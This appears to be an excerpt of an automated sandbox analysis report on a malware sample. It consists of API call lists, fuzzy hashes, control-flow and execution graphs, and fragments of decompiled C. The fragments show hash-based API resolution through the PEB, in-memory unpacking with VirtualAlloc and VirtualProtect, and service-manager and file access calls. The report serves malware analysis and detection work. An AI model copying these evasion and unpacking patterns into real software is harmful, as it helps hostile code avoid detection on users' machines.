                                                        APIs
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 007A0F08
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 007A0F3E
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 007A0F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 007A061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 007A069C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: 76c3f5dada7a41c4c3b3af7bb46fa9ffb5a613811aabbec168cfea6e73801099
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: 1D3158B365420597F3249A29DC89BEBB3D4DBD3358F480E3AF905C2240E52FD468C2E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 633 7b5ce0-7b5cec call 7b65e0 636 7b5d09-7b5d0d ExitProcess 633->636 637 7b5cee-7b5d04 call 7b3f00 call 7b3e60 633->637 637->636
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E007B65E0();
                                                        				if( *0x7bddb8 == 0) {
                                                        					 *0x7bddb8 = E007B3E60(_t5, E007B3F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x007b5ce0
                                                        0x007b5cec
                                                        0x007b5d04
                                                        0x007b5d04
                                                        0x007b5d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 007B5D0B
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 835cab6d027233f584542f942fea81fc6b6b659eadf1953c09005a40a05c3bad
                                                        • Instruction ID: 7f6f48860b1ed699744a9b0b3d64f724e57f27016baad80448ee1df76f901fb8
                                                        • Opcode Fuzzy Hash: 835cab6d027233f584542f942fea81fc6b6b659eadf1953c09005a40a05c3bad
                                                        • Instruction Fuzzy Hash: 81D0123470420497DF68ABB55859BAA259A8FE0748F10811AF051CF296FE3CCD60B764
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 642 7a0ad0-7a0b31 call 7a0ed0 645 7a0b33-7a0b42 642->645 646 7a0b47-7a0b4d 642->646 649 7a0d40 645->649 647 7a0b5f-7a0b7b 646->647 648 7a0b4f-7a0b54 646->648 651 7a0b7d-7a0b8e 647->651 652 7a0b90 647->652 648->647 653 7a0b96-7a0b9c 651->653 652->653 655 7a0bae-7a0bca 653->655 656 7a0b9e-7a0ba3 653->656 658 7a0bcc-7a0bd4 655->658 659 7a0bd7-7a0c21 VirtualAlloc 655->659 656->655 658->659 663 7a0d1a-7a0d24 659->663 664 7a0c27-7a0c2e 659->664 663->649 665 7a0c30-7a0c3f 664->665 666 7a0c44-7a0c4b 664->666 665->649 667 7a0c5d-7a0c79 666->667 668 7a0c4d-7a0c52 666->668 670 7a0c7b-7a0c83 667->670 671 7a0c86-7a0c8d 667->671 668->667 670->671 672 7a0c9f-7a0cbb 671->672 673 7a0c8f-7a0c94 671->673 675 7a0cc8-7a0cfa VirtualAlloc 672->675 676 7a0cbd-7a0cc5 672->676 673->672 679 7a0d02-7a0d07 675->679 676->675 679->663 680 7a0d09-7a0d18 679->680 680->649
                                                        APIs
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 007A0F08
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 007A0F3E
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 007A0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 007A0BFF
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 3fcf89d4d4bf61673e02f343645869aad627881358442e706024115af979b92c
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: CB510370740218ABDB209B54CE86FEAB7B8EF95701F004695FA08B7190D7BC9D85CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 79%
                                                        			E007B42C0(void* __ebx, long __ecx) {
                                                        				intOrPtr* _t1;
                                                        				void* _t4;
                                                        				void* _t16;
                                                        				long _t17;
                                                        				void* _t18;
                                                        
                                                        				_t8 = __ebx;
                                                        				_t1 =  *0x7be494;
                                                        				_t17 = __ecx;
                                                        				if(_t1 == 0) {
                                                        					_t1 = E007B3E60(__ebx, E007B3F00(0x9bab0b12), 0x7facde30, _t18);
                                                        					 *0x7be494 = _t1;
                                                        				}
                                                        				_t16 =  *_t1();
                                                        				if( *0x7bdd18 == 0) {
                                                        					 *0x7bdd18 = E007B3E60(_t8, E007B3F00(0x9bab0b12), 0x9ff0609c, _t18);
                                                        				}
                                                        				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
                                                        				return _t4;
                                                        			}








                                                        0x007b42c0
                                                        0x007b42c0
                                                        0x007b42c6
                                                        0x007b42cb
                                                        0x007b42de
                                                        0x007b42e3
                                                        0x007b42e3
                                                        0x007b42ea
                                                        0x007b42f3
                                                        0x007b430b
                                                        0x007b430b
                                                        0x007b4314
                                                        0x007b4318

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 007B4314
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 85c1202acf9b092c44bcfff7ac41c3aeabd8be85436be0d920cea90563142b98
                                                        • Instruction ID: 8df710852a73b9ca5e3aebda3e154bcdc438794948aff2be3c604968f10327e5
                                                        • Opcode Fuzzy Hash: 85c1202acf9b092c44bcfff7ac41c3aeabd8be85436be0d920cea90563142b98
                                                        • Instruction Fuzzy Hash: EEE065317002105B9B14ABBDA855FBB26AF9BD0644714452AB000DB356FD3DDD415398
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 007A0F08
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 007A0F3E
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 007A0F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 007A02F6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: a9a0cfb0ab6ed9af3c1279d53170462c950e2c7c1bcd84c1e9e95f70306d50e4
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: C45138B1900268EBDB20EF64DD89BDEB778EF89700F004599F509B7250DB785A85CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: dcfdffd72a1c51237716b4588b6b395e7e41f4d756c6f4d2e76d4a452b9b27da
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 5E311A78E4112C9BCB04DB98CD80AED7BB5FF9C340B508026D502736A4DB789986CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 0d50eb990b8cfbdf9926ec203fe9cd3f57f0abd43ad3e108b0a18856118ea786
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 2C5191B2A043019BE720DF26C845B5BB3E8ABD6794F444F2EF548E7241E23DD91487E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271261884.00000000007A0000.00000040.00000001.sdmp, Offset: 007A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7a0000_SampleRes.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: 8054b059fa1498e5ad83fb7ab4f69d75629858cfac05701477ab58768d026efa
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: 0B4149B66143059FD314DE69CC49BABB2D8ABC6740F088E3EF640D6240D278E90887E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.4%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1168
                                                        Total number of Limit Nodes:13

                                                        Graph

                                                        execution_graph 7092 2b4869 7097 2b4870 7092->7097 7093 2b496e 7094 2b492c 7093->7094 7096 2b3f00 GetPEB 7093->7096 7095 2b3f00 GetPEB 7095->7097 7098 2b4981 7096->7098 7097->7093 7097->7094 7097->7095 7100 2b3e60 GetPEB 7097->7100 7099 2b3e60 GetPEB 7098->7099 7099->7094 7100->7097 6889 2b1928 6910 2b191f 6889->6910 6890 2b1bc6 6891 2b35c0 GetPEB 6890->6891 6893 2b1bd0 6891->6893 6892 2b1ba4 6894 2b1bf1 6893->6894 6895 2b3f00 GetPEB 6893->6895 6899 2b1c23 6894->6899 6900 2b3f00 GetPEB 6894->6900 6896 2b1be5 6895->6896 6897 2b3e60 GetPEB 6896->6897 6897->6894 6898 2b4e30 GetPEB 6898->6910 6902 2b1c4b 6899->6902 6904 2b3f00 GetPEB 6899->6904 6901 2b1c17 6900->6901 6903 2b3e60 GetPEB 6901->6903 6903->6899 6905 2b1c3f 6904->6905 6907 2b3e60 GetPEB 6905->6907 6906 2b3e60 GetPEB 6906->6910 6907->6902 6908 2b35c0 GetPEB 6908->6910 6909 2b3f00 GetPEB 6909->6910 6910->6890 6910->6892 6910->6898 6910->6906 6910->6908 6910->6909 5943 2b30a0 5951 2b30ba 5943->5951 5944 2b32ab 5945 2b3238 5944->5945 5953 2b3f00 GetPEB 5944->5953 5947 2b3291 RtlAllocateHeap 5947->5945 5947->5951 5948 2b3f00 GetPEB 5948->5951 5951->5944 5951->5945 5951->5947 5951->5948 5952 2b3e60 GetPEB 5951->5952 5952->5951 5954 2b32bf 5953->5954 5955 2b3e60 5954->5955 5956 2b3ebc 5955->5956 5957 2b3e9c 5955->5957 5956->5945 5957->5956 5958 2b3f00 GetPEB 5957->5958 5960 2b40f5 5957->5960 5959 2b40e9 5958->5959 5961 2b3e60 GetPEB 5959->5961 5962 2b3f00 GetPEB 5960->5962 5968 2b4126 5960->5968 5961->5960 5964 2b411a 5962->5964 5963 2b3e60 GetPEB 5966 2b4157 5963->5966 5967 2b3e60 GetPEB 5964->5967 5965 2b4138 5965->5945 5966->5945 5967->5968 5968->5963 5968->5965 5996 2b5ce0 6004 2b65e0 5996->6004 5998 2b5ce5 5999 2b5d09 ExitProcess 5998->5999 6000 2b3f00 GetPEB 5998->6000 6001 2b5cf8 6000->6001 6002 2b3e60 GetPEB 6001->6002 6003 2b5d04 6002->6003 6003->5999 6049 2b65fd 6004->6049 6007 2b706e 6346 2b8740 6007->6346 6009 2b68df 6009->5998 6010 2b6dcd 6321 2bb2e0 6010->6321 6012 2b3f00 GetPEB 6040 2b6927 6012->6040 6013 2b7061 6337 2b8d40 6013->6337 6020 2b6f27 GetTickCount 6020->6049 6027 2b7073 6027->5998 6029 2b3e60 GetPEB 6029->6040 6033 2b3f00 GetPEB 6033->6049 6034 2b7066 6034->5998 6037 2b4220 GetPEB 6037->6049 6040->6012 6040->6020 6040->6029 6044 2b6975 GetTickCount 6040->6044 6043 2b3e60 GetPEB 6043->6049 6044->6049 6048 2b4160 GetPEB 6048->6049 6049->6007 6049->6009 6049->6010 6049->6013 6049->6033 6049->6037 6049->6040 6049->6043 6049->6048 6050 2b8400 6049->6050 6056 2b7120 6049->6056 6077 2b8e80 6049->6077 6087 2b8970 6049->6087 6099 2b80a0 6049->6099 6111 2b9860 6049->6111 6127 2b9620 6049->6127 6136 2b12b0 6049->6136 6158 2bafe0 6049->6158 6163 2b8700 6049->6163 6169 2b6060 6049->6169 6190 2bb430 6049->6190 6197 2b9f30 6049->6197 6206 2b61e0 6049->6206 6218 2b94d0 6049->6218 6225 2b3310 6049->6225 6235 2b1840 6049->6235 6250 2b3460 6049->6250 6260 2b53d0 6049->6260 6265 2b9270 6049->6265 6275 2b8bb0 6049->6275 6285 2b72d0 6049->6285 6295 2b9050 6049->6295 6309 2b4770 6049->6309 6326 2bb1d0 6049->6326 6331 2b7410 6049->6331 6054 2b84e3 6050->6054 6051 2b85bd 6051->6049 6052 2b8600 CreateFileW 6052->6051 6052->6054 6053 2b3f00 GetPEB 6053->6054 6054->6051 6054->6052 6054->6053 6055 2b3e60 GetPEB 6054->6055 6055->6054 6059 2b7125 6056->6059 6057 2b7233 6364 2b34c0 6057->6364 6059->6057 6060 2b7232 6059->6060 6064 2b7080 GetPEB LoadLibraryW 6059->6064 6060->6049 6062 2b7265 LoadLibraryW 6065 2b727a 6062->6065 6066 2b7290 6062->6066 6063 2b3f00 GetPEB 6067 2b7254 6063->6067 6064->6059 6068 2b3f00 GetPEB 6065->6068 6072 2b72b8 6066->6072 6074 2b3f00 GetPEB 6066->6074 6069 2b3e60 GetPEB 6067->6069 6070 2b7284 6068->6070 6073 2b7260 6069->6073 6071 2b3e60 GetPEB 6070->6071 6071->6066 6072->6049 6073->6062 6075 2b72ac 6074->6075 6076 2b3e60 GetPEB 6075->6076 6076->6072 6084 2b8ea0 6077->6084 6078 2b901b 6080 2b3f00 GetPEB 6078->6080 6081 2b8fc6 6078->6081 6079 2b8ff2 OpenServiceW 6079->6084 6082 2b902e 6080->6082 6081->6049 6085 2b3e60 GetPEB 6082->6085 6083 2b3f00 GetPEB 6083->6084 6084->6078 6084->6079 6084->6081 6084->6083 6086 2b3e60 GetPEB 6084->6086 6085->6081 6086->6084 6095 2b8991 6087->6095 6088 2b8b74 6092 2b8add 6088->6092 6093 2b3f00 GetPEB 6088->6093 6090 2b3f00 GetPEB 6090->6095 6091 2b34c0 GetPEB 6091->6095 6092->6049 6094 2b8b87 6093->6094 6096 2b3e60 GetPEB 6094->6096 6095->6088 6095->6090 6095->6091 6095->6092 6097 2b3e60 GetPEB 6095->6097 6098 2b3460 GetPEB 6095->6098 6374 2b5040 6095->6374 6096->6092 6097->6095 6098->6095 6103 2b8163 6099->6103 6100 2b34c0 GetPEB 6100->6103 6101 2b8397 CreateFileW 6101->6103 6104 2b83e6 6101->6104 6102 2b8358 6102->6049 6103->6100 6103->6101 6103->6102 6105 2b83c7 6103->6105 6106 2b3e60 GetPEB 6103->6106 6110 2b3f00 GetPEB 6103->6110 6104->6049 6105->6104 6107 2b3f00 GetPEB 6105->6107 6106->6103 6108 2b83da 6107->6108 6109 2b3e60 GetPEB 6108->6109 6109->6104 6110->6103 6125 2b9880 6111->6125 6112 2b99b2 OpenSCManagerW 6112->6125 6113 2b9b02 6114 2b9b26 SHGetFolderPathW 6113->6114 6115 2b3f00 GetPEB 6113->6115 6399 2b3040 6114->6399 6120 2b9b15 6115->6120 6116 2b9a66 CloseServiceHandle 6116->6125 6119 2b9969 SHGetFolderPathW 6119->6125 6123 2b3e60 GetPEB 6120->6123 6121 2b3f00 GetPEB 6121->6125 6122 2b9af5 6122->6049 6124 2b9b21 6123->6124 6124->6114 6125->6112 6125->6113 6125->6116 6125->6119 6125->6121 6125->6122 6126 2b3e60 GetPEB 6125->6126 6404 2b7c60 6125->6404 6126->6125 6133 2b9630 6127->6133 6128 2b9829 6428 2b3780 6128->6428 6129 2b34c0 GetPEB 6129->6133 6130 2b981f 6130->6049 6132 2b9839 6132->6049 6133->6128 6133->6129 6133->6130 6134 2b3e60 GetPEB 6133->6134 6135 2b3f00 GetPEB 6133->6135 6134->6133 6135->6133 6156 2b12e1 6136->6156 6138 2b181c 6557 2b4220 6138->6557 6140 2b3f00 GetPEB 6140->6156 6141 2b1823 6141->6049 6143 2b17d1 6143->6049 6145 2b34c0 GetPEB 6145->6156 6148 2b1641 _snwprintf 6152 2b3460 GetPEB 6148->6152 6150 2b42c0 GetPEB 6150->6156 6152->6156 6154 2b3e60 GetPEB 6154->6156 6155 2b3460 GetPEB 6155->6156 6156->6138 6156->6140 6156->6141 6156->6143 6156->6145 6156->6148 6156->6150 6156->6154 6156->6155 6157 2b4220 GetPEB 6156->6157 6455 2b1fc0 6156->6455 6463 2b1e70 6156->6463 6472 2b5c00 6156->6472 6491 2b1c70 6156->6491 6507 2b2230 6156->6507 6515 2b2be0 6156->6515 6530 2b4ea0 6156->6530 6535 2b1900 6156->6535 6157->6156 6159 2baff8 6158->6159 6161 2bb101 6158->6161 6160 2b3f00 GetPEB 6159->6160 6159->6161 6162 2b3e60 GetPEB 6159->6162 6160->6159 6161->6049 6162->6159 6164 2b8709 6163->6164 6165 2b871f 6163->6165 6166 2b3f00 GetPEB 6164->6166 6165->6049 6167 2b8713 6166->6167 6168 2b3e60 GetPEB 6167->6168 6168->6165 6599 2b5500 6169->6599 6171 2b6134 6171->6049 6172 2b6074 6172->6171 6173 2b613c 6172->6173 6175 2b3f00 GetPEB 6172->6175 6177 2b3e60 GetPEB 6172->6177 6174 2b35c0 GetPEB 6173->6174 6176 2b6147 6174->6176 6175->6172 6178 2b3f00 GetPEB 6176->6178 6179 2b6168 6176->6179 6177->6172 6180 2b615c 6178->6180 6181 2b61a2 6179->6181 6183 2b3f00 GetPEB 6179->6183 6182 2b3e60 GetPEB 6180->6182 6186 2b61ca 6181->6186 6187 2b3f00 GetPEB 6181->6187 6182->6179 6184 2b6196 6183->6184 6185 2b3e60 GetPEB 6184->6185 6185->6181 6186->6049 6188 2b61be 6187->6188 6189 2b3e60 GetPEB 6188->6189 6189->6186 6192 2bb440 6190->6192 6191 2bb4ba 6191->6049 6192->6191 6609 2bab50 6192->6609 6625 2ba170 6192->6625 6646 2ba7a0 6192->6646 6666 2ba5e0 6192->6666 6204 2b9f40 6197->6204 6198 2ba01b 6200 2b9f64 6198->6200 6201 2b3f00 GetPEB 6198->6201 6199 2b3f00 GetPEB 6199->6204 6200->6049 6202 2ba02e 6201->6202 6203 2b3e60 GetPEB 6202->6203 6203->6200 6204->6198 6204->6199 6204->6200 6205 2b3e60 GetPEB 6204->6205 6205->6204 6214 2b6202 6206->6214 6209 2b42c0 GetPEB 6209->6214 6210 2b624b 6210->6049 6211 2b6490 6211->6049 6212 2b3e60 GetPEB 6212->6214 6213 2b3f00 GetPEB 6213->6214 6214->6209 6214->6210 6214->6212 6214->6213 6216 2b642d 6214->6216 6780 2b55b0 6214->6780 6789 2b4c80 6214->6789 6215 2b3f00 GetPEB 6215->6216 6216->6211 6216->6215 6217 2b3e60 GetPEB 6216->6217 6217->6216 6223 2b94f0 6218->6223 6219 2b95c2 6219->6049 6221 2b4c80 GetPEB 6221->6223 6222 2b3f00 GetPEB 6222->6223 6223->6219 6223->6221 6223->6222 6224 2b3e60 GetPEB 6223->6224 6798 2b46c0 6223->6798 6224->6223 6226 2b334a 6225->6226 6227 2b336f 6226->6227 6228 2b3f00 GetPEB 6226->6228 6231 2b3f00 GetPEB 6227->6231 6234 2b3397 6227->6234 6229 2b3363 6228->6229 6230 2b3e60 GetPEB 6229->6230 6230->6227 6232 2b338b 6231->6232 6233 2b3e60 GetPEB 6232->6233 6233->6234 6234->6049 6236 2b184c 6235->6236 6237 2b1862 6235->6237 6238 2b3f00 GetPEB 6236->6238 6241 2b3f00 GetPEB 6237->6241 6245 2b188b 6237->6245 6239 2b1856 6238->6239 6240 2b3e60 GetPEB 6239->6240 6240->6237 6242 2b187f 6241->6242 6243 2b3e60 GetPEB 6242->6243 6243->6245 6244 2b18ee 6244->6049 6245->6244 6245->6245 6813 2b25e0 6245->6813 6247 2b18d8 6248 2b18dc 6247->6248 6249 2b4220 GetPEB 6247->6249 6248->6049 6249->6244 6251 2b3483 6250->6251 6252 2b346d 6250->6252 6256 2b3f00 GetPEB 6251->6256 6259 2b34ab 6251->6259 6253 2b3f00 GetPEB 6252->6253 6254 2b3477 6253->6254 6255 2b3e60 GetPEB 6254->6255 6255->6251 6257 2b349f 6256->6257 6258 2b3e60 GetPEB 6257->6258 6258->6259 6259->6049 6262 2b53e0 6260->6262 6261 2b54b4 6261->6049 6262->6261 6263 2b3f00 GetPEB 6262->6263 6264 2b3e60 GetPEB 6262->6264 6263->6262 6264->6262 6273 2b9290 6265->6273 6267 2b949c 6269 2b3f00 GetPEB 6267->6269 6272 2b9410 6267->6272 6268 2b3f00 GetPEB 6268->6273 6270 2b94af 6269->6270 6271 2b3e60 GetPEB 6270->6271 6271->6272 6272->6049 6273->6267 6273->6268 6273->6272 6274 2b3e60 GetPEB 6273->6274 6828 2b1000 6273->6828 6274->6273 6283 2b8bc4 6275->6283 6276 2b8d1d 6837 2b36b0 6276->6837 6277 2b3780 2 API calls 6277->6283 6279 2b8d10 6279->6049 6281 2b34c0 GetPEB 6281->6283 6282 2b3e60 GetPEB 6282->6283 6283->6276 6283->6277 6283->6279 6283->6281 6283->6282 6284 2b3f00 GetPEB 6283->6284 6284->6283 6286 2b72d9 6285->6286 6287 2b72ef 6285->6287 6288 2b3f00 GetPEB 6286->6288 6290 2b7318 6287->6290 6292 2b3f00 GetPEB 6287->6292 6289 2b72e3 6288->6289 6291 2b3e60 GetPEB 6289->6291 6290->6049 6291->6287 6293 2b730c 6292->6293 6294 2b3e60 GetPEB 6293->6294 6294->6290 6308 2b9070 6295->6308 6296 2b91de 6296->6049 6297 2b91e4 6298 2b921f 6297->6298 6299 2b3f00 GetPEB 6297->6299 6303 2b9247 6298->6303 6305 2b3f00 GetPEB 6298->6305 6301 2b9213 6299->6301 6300 2b3f00 GetPEB 6300->6308 6304 2b3e60 GetPEB 6301->6304 6302 2b3e60 GetPEB 6302->6308 6303->6049 6304->6298 6306 2b923b 6305->6306 6307 2b3e60 GetPEB 6306->6307 6307->6303 6308->6296 6308->6297 6308->6300 6308->6302 6310 2b4785 6309->6310 6318 2b479b 6309->6318 6311 2b3f00 GetPEB 6310->6311 6313 2b478f 6311->6313 6312 2b47cb GetCurrentProcessId 6317 2b47d5 6312->6317 6315 2b3e60 GetPEB 6313->6315 6314 2b3f00 GetPEB 6316 2b47b7 6314->6316 6315->6318 6319 2b3e60 GetPEB 6316->6319 6317->6049 6318->6312 6318->6314 6320 2b47c3 6319->6320 6320->6312 6323 2bb2ec 6321->6323 6322 2b3f00 GetPEB 6322->6323 6323->6322 6324 2bb422 6323->6324 6325 2b3e60 GetPEB 6323->6325 6324->6009 6325->6323 6327 2bb1e0 6326->6327 6328 2bb2b2 6327->6328 6329 2b3e60 GetPEB 6327->6329 6330 2b3f00 GetPEB 6327->6330 6328->6049 6328->6328 6329->6327 6330->6327 6336 2b7420 6331->6336 6332 2b7608 6332->6049 6333 2b3f00 GetPEB 6333->6336 6334 2b3e60 GetPEB 6334->6336 6335 2b4fd0 GetPEB 6335->6336 6336->6332 6336->6333 6336->6334 6336->6335 6344 2b8d50 6337->6344 6338 2b8e3f 6339 2b4b70 2 API calls 6338->6339 6340 2b8e4f 6339->6340 6340->6034 6341 2b34c0 GetPEB 6341->6344 6342 2b8e29 6342->6034 6343 2b3f00 GetPEB 6343->6344 6344->6338 6344->6341 6344->6342 6344->6343 6345 2b3e60 GetPEB 6344->6345 6345->6344 6360 2b8753 6346->6360 6347 2b34c0 GetPEB 6347->6360 6348 2b88df 6348->6027 6349 2b8903 6351 2b8922 6349->6351 6353 2b3f00 GetPEB 6349->6353 6357 2b8955 6351->6357 6358 2b3f00 GetPEB 6351->6358 6352 2b3f00 GetPEB 6352->6360 6355 2b8916 6353->6355 6354 2b8e80 2 API calls 6354->6360 6356 2b3e60 GetPEB 6355->6356 6356->6351 6357->6027 6362 2b8949 6358->6362 6359 2b3e60 GetPEB 6359->6360 6360->6347 6360->6348 6360->6349 6360->6352 6360->6354 6360->6359 6361 2b3780 2 API calls 6360->6361 6856 2b7700 6360->6856 6361->6360 6363 2b3e60 GetPEB 6362->6363 6363->6357 6365 2b34e3 6364->6365 6366 2b3508 6365->6366 6367 2b3f00 GetPEB 6365->6367 6370 2b3f00 GetPEB 6366->6370 6373 2b3530 6366->6373 6368 2b34fc 6367->6368 6369 2b3e60 GetPEB 6368->6369 6369->6366 6371 2b3524 6370->6371 6372 2b3e60 GetPEB 6371->6372 6372->6373 6373->6062 6373->6063 6388 2b505c 6374->6388 6375 2b5367 6377 2b3f00 GetPEB 6375->6377 6379 2b5386 6375->6379 6376 2b53ae 6376->6095 6378 2b537a 6377->6378 6380 2b3e60 GetPEB 6378->6380 6379->6376 6383 2b3f00 GetPEB 6379->6383 6380->6379 6381 2b534d RtlAllocateHeap 6381->6376 6381->6388 6385 2b53a2 6383->6385 6384 2b3f00 GetPEB 6384->6388 6386 2b3e60 GetPEB 6385->6386 6386->6376 6387 2b3e60 GetPEB 6387->6388 6388->6375 6388->6376 6388->6381 6388->6384 6388->6387 6389 2b42c0 6388->6389 6390 2b42cd 6389->6390 6395 2b42e3 6389->6395 6391 2b3f00 GetPEB 6390->6391 6392 2b42d7 6391->6392 6394 2b3e60 GetPEB 6392->6394 6393 2b430b 6393->6388 6394->6395 6395->6393 6396 2b3f00 GetPEB 6395->6396 6397 2b42ff 6396->6397 6398 2b3e60 GetPEB 6397->6398 6398->6393 6400 2b3050 6399->6400 6402 2b307a 